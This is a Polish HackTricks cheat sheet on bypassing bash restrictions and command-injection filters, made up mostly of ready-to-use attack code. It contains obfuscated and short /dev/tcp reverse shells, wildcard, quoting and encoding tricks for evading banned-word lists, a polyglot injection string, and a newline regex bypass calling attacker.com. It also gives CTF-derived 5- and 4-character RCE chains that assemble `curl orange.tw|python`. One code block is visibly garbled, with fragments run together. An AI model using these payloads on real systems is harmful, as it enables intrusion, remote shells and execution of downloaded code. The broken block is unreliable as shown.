# Ominięcie Ograniczeń Linuxa {% hint style="success" %} Dowiedz się i ćwicz Hacking AWS:[**HackTricks Szkolenie AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Dowiedz się i ćwicz Hacking GCP: [**HackTricks Szkolenie GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Wesprzyj HackTricks * Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)! * **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Dziel się trikami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
{% endhint %}
\ Użyj [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) do łatwego tworzenia i **automatyzacji workflowów** zasilanych przez najbardziej zaawansowane narzędzia społecznościowe na świecie.\ Zdobądź Dostęp Dziś: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} ## Powszechne Ominięcia Ograniczeń ### Odwrócony Shell ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' # echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` ### Krótka powłoka odwrotna ```bash #Trick from Dikline #Get a rev shell with (sh)0>/dev/tcp/10.10.10.10/443 #Then get the out of the rev shell executing inside of it: exec >&0 ``` ### Ominięcie ścieżek i zakazanych słów ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution /usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments touch -- -la # -- stops processing options after the -- ls * echo * #List current files and folders with echo and wildcard # [chars] /usr/bin/n[c] # /usr/bin/nc # Quotes 'p'i'n'g # ping "w"h"o"a"m"i # whoami ech''o test # echo test ech""o test # echo test bas''e64 # base64 #Backslashes \u\n\a\m\e \-\a # uname -a /\b\i\n/////s\h # $@ who$@ami #whoami # Transformations (case, reverse, base64) $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case $(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash) $(rev<<<'imaohw') #whoami bash<<<$(base64 -d<< /tmp/[ chmod +x [ export PATH=/tmp:$PATH if [ "a" ]; then echo 1; fi # Will print hello! ``` ### Wielojęzyczne wstrzykiwanie poleceń ```bash 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ ``` ### Ominięcie potencjalnych wyrażeń regularnych ```bash # A regex that only allow letters and numbers might be vulnerable to new line characters 1%0a`curl http://attacker.com` ``` ### Bashfuscator ```bash # From https://github.com/Bashfuscator/Bashfuscator ./bashfuscator -c 'cat /etc/passwd' ``` ### RCE z 5 znakami ```bash # From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge #Oragnge Tsai solution ## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date http://host/?cmd=>ls\ http://host/?cmd=ls>_ http://host/?cmd=>\ \ http://host/?cmd=>-t\ http://host/?cmd=>\>g http://host/?cmd=ls>>_ ## Step2: generate `curl orange.tw|python` to file "g" ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file http://host/?cmd=>on http://host/?cmd=>th\ http://host/?cmd=>py\ http://host/?cmd=>\|\ http://host/?cmd=>tw\ http://host/?cmd=>e.\ http://host/?cmd=>ng\ http://host/?cmd=>ra\ http://host/?cmd=>o\ http://host/?cmd=>\ \ http://host/?cmd=>rl\ http://host/?cmd=>cu\ http://host/?cmd=sh _ # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file ## Finally execute the file "g" http://host/?cmd=sh g # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*" https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ ## Execute tar command over a folder http://52.199.204.34/?cmd=>tar http://52.199.204.34/?cmd=>zcf http://52.199.204.34/?cmd=>zzz http://52.199.204.34/?cmd=*%20/h* # Another curiosity if you can read files of the current folder ln /f* ## If there is a file /flag.txt that will create a hard link ## to it in the current folder ``` ### Uruchamianie kodu zdalnego z wykorzystaniem 4 znaków ```bash # In a similar fashion to the previous bypass this one just need 4 chars to execute commands # it will follow the same principle of creating the command `ls -t>g` in a file # and then generate the full command in filenames # generate "g> ht- sl" to file "v" '>dir' '>sl' '>g\>' '>ht-' '*>v' # reverse file "v" to file "x", content "ls -th >g" '>rev' '*v>x' # generate "curl orange.tw|python;" '>\;\\' '>on\\' '>th\\' '>py\\' '>\|\\' '>tw\\' '>e.\\' '>ng\\' '>ra\\' '>o\\' '>\ \\' '>rl\\' '>cu\\' # got shell 'sh x' 'sh g' ``` ## Bypass ochrony tylko do odczytu/Noexec/Distroless Jeśli znajdujesz się w systemie plików z **ochroną tylko do odczytu i noexec** lub nawet w kontenerze distroless, istnieją nadal sposoby na **wykonanie dowolnych binarnych plików, nawet powłoki!:** {% content-ref url="bypass-fs-protections-read-only-no-exec-distroless/" %} [bypass-fs-protections-read-only-no-exec-distroless](bypass-fs-protections-read-only-no-exec-distroless/) {% endcontent-ref %} ## Bypass Chroot i innych więzień {% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md) {% endcontent-ref %} ## Odnośniki i Więcej * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) * [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) * [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
\ Użyj [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions), aby łatwo tworzyć i **automatyzować zadania** przy użyciu najbardziej zaawansowanych narzędzi społeczności.\ Otrzymaj Dostęp Dziś: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} {% hint style="success" %} Naucz się i ćwicz Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Naucz się i ćwicz Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Wesprzyj HackTricks * Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)! * **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Udostępniaj sztuczki hakerskie, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na githubie.
{% endhint %}